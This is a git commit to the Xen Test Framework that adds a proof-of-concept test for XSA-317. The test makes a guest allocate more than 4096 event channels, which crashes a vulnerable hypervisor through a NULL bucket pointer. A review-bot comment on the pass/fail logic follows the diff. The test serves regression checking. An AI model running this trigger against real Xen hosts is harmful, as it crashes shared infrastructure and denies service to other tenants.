XSA-317 PoC
authorJulien Grall <jgrall@amazon.com>
Tue, 7 Jul 2020 10:54:49 +0000 (11:54 +0100)
committerAndrew Cooper <andrew.cooper3@citrix.com>
Mon, 20 Jul 2020 14:48:21 +0000 (15:48 +0100)
Signed-off-by: Julien Grall <jgrall@amazon.com>
Signed-off-by: Andrew Cooper <andrew.cooper3@citrix.com>
docs/all-tests.dox
include/xen/event_channel.h
include/xtf/xenbus.h
tests/xsa-317/Makefile [new file with mode: 0644]
tests/xsa-317/extra.cfg.in [new file with mode: 0644]
tests/xsa-317/main.c [new file with mode: 0644]

index 15eeccda21ae2f78ab7e0df622ee03014f7744bc..8eed0cf14fa7baf8262fe70156ae779860a48242 100644 (file)
@@ -150,6 +150,8 @@ states.
 
 @subpage test-xsa-316 - Bad error path in GNTTABOP_map_grant.
 
+@subpage test-xsa-317 - Incorrect error handling in event channel port allocation.
+
 
 @section index-utility Utilities
 
index 62ee95a0188715d6348ea4c6330ab278fc1440ce..bef0f464cd08734b21ba84dee499dfbbe876874d 100644 (file)
@@ -1,12 +1,22 @@
 #ifndef XEN_PUBLIC_EVENT_CHANNEL_H
 #define XEN_PUBLIC_EVENT_CHANNEL_H
 
+#include <xen/xen.h>
+
 #define EVTCHNOP_send             4
+#define EVTCHNOP_alloc_unbound    6
 #define EVTCHNOP_init_control    11
 #define EVTCHNOP_expand_array    12
 
 typedef uint32_t evtchn_port_t;
 
+struct evtchn_alloc_unbound {
+    /* IN parameters. */
+    domid_t dom, remote_dom;
+    /* OUT parameters. */
+    evtchn_port_t port;
+};
+
 struct evtchn_init_control {
     /* IN parameters. */
     uint64_t control_gfn;
index 3ed77d513b670b6349a69b2c3b5cc38460dc159a..76fa7392f2d1cda592051ba2b239328498417984 100644 (file)
@@ -2,6 +2,7 @@
 #define XTF_XENBUS_H
 
 #include <xtf/types.h>
+#include <xtf/compiler.h>
 #include <xen/event_channel.h>
 #include <xen/io/xs_wire.h>
 
diff --git a/tests/xsa-317/Makefile b/tests/xsa-317/Makefile
new file mode 100644 (file)
index 0000000..f930b03
--- /dev/null
@@ -0,0 +1,11 @@
+include $(ROOT)/build/common.mk
+
+NAME      := xsa-317
+CATEGORY  := xsa
+TEST-ENVS := $(ALL_ENVIRONMENTS)
+
+TEST-EXTRA-CFG := extra.cfg.in
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-317/extra.cfg.in b/tests/xsa-317/extra.cfg.in
new file mode 100644 (file)
index 0000000..0cae09a
--- /dev/null
@@ -0,0 +1 @@
+max_event_channels=4096
diff --git a/tests/xsa-317/main.c b/tests/xsa-317/main.c
new file mode 100644 (file)
index 0000000..8d52746
--- /dev/null
@@ -0,0 +1,60 @@
+/**
+ * @file tests/xsa-317/main.c
+ * @ref test-xsa-317
+ *
+ * @page test-xsa-317 XSA-317
+ *
+ * Advisory: [XSA-317](https://xenbits.xen.org/xsa/advisory-317.html)
+ *
+ * This vulnerability affects:
+ * - HVM and 32-bit PV guests allowed to use more than 1024 event channels.
+ * - 64-bit guests allowed to use more than 4096 event channels.
+ *
+ * The testcase will try to allocate more than 4096 event channels. On
+ * vulnerable platform, Xen will fall over a NULL evtchn bucket pointer.
+ *
+ * @see tests/xsa-317/main.c
+ */
+#include <xtf.h>
+
+const char test_title[] = "XSA-317 PoC";
+
+void test_main(void)
+{
+    unsigned int i;
+    struct evtchn_alloc_unbound ub = {
+        .dom = DOMID_SELF,
+        .remote_dom = 0,
+    };
+
+    /*
+     * Create more event channels than the 4096 ABI limit.  A fixed Xen, or
+     * not vulnerable configuration, should fail with -ENOSPC eventually.
+     */
+    for ( i = 0; i < 4100; ++i )
+    {
+        int rc = hypercall_event_channel_op(EVTCHNOP_alloc_unbound, &ub);
+
+        if ( rc == -ENOSPC )
+            break;
+
+        if ( rc )
+            return xtf_error("Error: Unexpected alloc_unbound error %d\n", rc);
+    }
+
+    /*
+     * If Xen is still alive, it didn't fall over a NULL evtchn bucket
+     * pointer.
+     */
+    xtf_success("Success: Not vulnerable to XSA-317\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
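Review bot: In test_main() the "Not vulnerable" message is printed whether the loop left through the `-ENOSPC` break or ran all 4100 iterations, and the value of `i` at that point is never reported. A run where the guest was capped well below the limit set in extra.cfg.in (for example if `max_event_channels=4096` was not applied, which is an inference and not visible in this hunk) would presumably hit `-ENOSPC` early and look the same as a real pass. Logging the count before the break, e.g. `printk("alloc_unbound: -ENOSPC after %u ports\n", i);`, lets whoever reads the result confirm that the allocation reached the range the advisory describes. The literal 4100 also depends on the 4096 in extra.cfg.in, so a short comment tying the two together would help keep them in sync.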